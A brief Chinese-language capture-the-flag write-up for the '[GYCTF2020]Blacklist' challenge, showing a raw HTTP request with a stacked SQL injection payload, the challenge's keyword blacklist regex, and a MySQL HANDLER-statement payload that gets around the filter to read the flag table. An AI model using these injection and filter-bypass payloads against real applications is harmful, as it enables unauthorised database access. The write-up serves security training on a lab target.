[GYCTF2020]Blacklist

发布时间 2023-12-11 15:16:46作者: imtaieee

堆叠注入,前面与“[强网杯 2019]随便注”一致,查询到 flagFlagHere 表中。

GET /?inject=1'%3bshow+tables%3b%23 HTTP/1.1
Host: 0ebc2b91-75a9-4336-89cc-32c2c89ee4d1.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0ebc2b91-75a9-4336-89cc-32c2c89ee4d1.node4.buuoj.cn:81/?inject=0%3Bshow+databases%3B
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


题目过滤:return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);。因此使用HANDLER Statement 的方式读取 flag

0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#